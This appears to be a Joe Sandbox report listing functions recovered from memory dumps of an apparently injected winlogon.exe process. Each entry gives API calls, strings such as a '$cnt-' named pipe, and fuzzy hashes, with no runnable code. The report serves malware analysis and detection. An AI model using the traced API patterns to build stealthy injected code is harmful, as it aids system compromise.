API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783

Function 000001CA7D21104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D2110B1
RegEnumValueW.ADVAPI32 ref: 000001CA7D211117
GetProcessHeap.KERNEL32 ref: 000001CA7D21115A
HeapAlloc.KERNEL32 ref: 000001CA7D211168
GetProcessHeap.KERNEL32 ref: 000001CA7D211185
HeapFree.KERNEL32 ref: 000001CA7D211193

Strings

d, xrefs: 000001CA7D2110D6

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92

Function 000001CA7D212518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001CA7D21252D
GetCurrentProcessId.KERNEL32 ref: 000001CA7D212537
CreateFileW.KERNEL32 ref: 000001CA7D212568
WriteFile.KERNEL32 ref: 000001CA7D212590
ReadFile.KERNEL32 ref: 000001CA7D2125AF
CloseHandle.KERNEL32 ref: 000001CA7D2125B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 000001CA7D212549

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6

Function 000001CA7D217C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D217C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D217CCA
_RTC_Initialize.LIBCMT ref: 000001CA7D217CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D217D1E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D217D49

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3

Function 000001CA7D1B7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D1B7078
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D1B70CA
_RTC_Initialize.LIBCMT ref: 000001CA7D1B70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D1B711E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D1B7149

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783

Function 000001CA7D219AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3

Strings

api-ms-, xrefs: 000001CA7D219B51

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3

Function 000001CA7D223400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001CA7D223431
GetLastError.KERNEL32 ref: 000001CA7D22343D
CloseHandle.KERNEL32 ref: 000001CA7D223455
CreateFileW.KERNEL32 ref: 000001CA7D223480
WriteConsoleW.KERNEL32 ref: 000001CA7D22349F

Strings

CONOUT$, xrefs: 000001CA7D223461

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6

Function 000001CA7D216270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D2162AB
GetThreadContext.KERNEL32 ref: 000001CA7D216415

Part of subcall function 000001CA7D2160A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D2160A4

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86

Function 000001CA7D212098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D2120A6
TlsFree.KERNEL32 ref: 000001CA7D21225F
TlsFree.KERNEL32 ref: 000001CA7D21226B
TlsFree.KERNEL32 ref: 000001CA7D212277
TlsFree.KERNEL32 ref: 000001CA7D212283
TlsFree.KERNEL32 ref: 000001CA7D21228F

Part of subcall function 000001CA7D215E50: GetCurrentThreadId.KERNEL32 ref: 000001CA7D215E66

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3

Function 000001CA7D2135C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2135EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2135FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D213673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2136D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D2124D1), ref: 000001CA7D2136E7

Strings

$cnt-, xrefs: 000001CA7D21366C

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6

Function 000001CA7D1E35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36E7

Strings

$cnt-, xrefs: 000001CA7D1E366C

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383

Function 000001CA7D21C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001CA7D21C94F
SetLastError.KERNEL32 ref: 000001CA7D21C96E
FlsSetValue.KERNEL32 ref: 000001CA7D21C997
FlsSetValue.KERNEL32 ref: 000001CA7D21C9A8
FlsSetValue.KERNEL32 ref: 000001CA7D21C9B9

Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0

SetLastError.KERNEL32 ref: 000001CA7D21C9DC

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3

Function 000001CA7D211A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CA7D211A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
lstrlenW.KERNEL32 ref: 000001CA7D211A8F
StrCpyW.SHLWAPI ref: 000001CA7D211AA2
CloseHandle.KERNEL32 ref: 000001CA7D211AB0

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6

Function 000001CA7D213E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001CA7D213AAC), ref: 000001CA7D213EAE

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB

Function 000001CA7D211AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001CA7D211AF4
StrCmpNIW.SHLWAPI ref: 000001CA7D211B0E
lstrlenW.KERNEL32 ref: 000001CA7D211B1D
StrCpyW.SHLWAPI ref: 000001CA7D211B32

Strings

\\?\, xrefs: 000001CA7D211B02

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6

Function 000001CA7D21B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001CA7D21B929
GetProcAddress.KERNEL32 ref: 000001CA7D21B93F
FreeLibrary.KERNEL32 ref: 000001CA7D21B95B

Strings

mscoree.dll, xrefs: 000001CA7D21B920
CorExitProcess, xrefs: 000001CA7D21B938

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB

Function 000001CA7D213708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001CA7D21275A), ref: 000001CA7D21372A
StrCpyW.SHLWAPI ref: 000001CA7D21373A
StrCatW.SHLWAPI ref: 000001CA7D213746
PathCombineW.SHLWAPI(?,?,00000000,000001CA7D21275A), ref: 000001CA7D213754

Strings

\\.\pipe\, xrefs: 000001CA7D213720

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

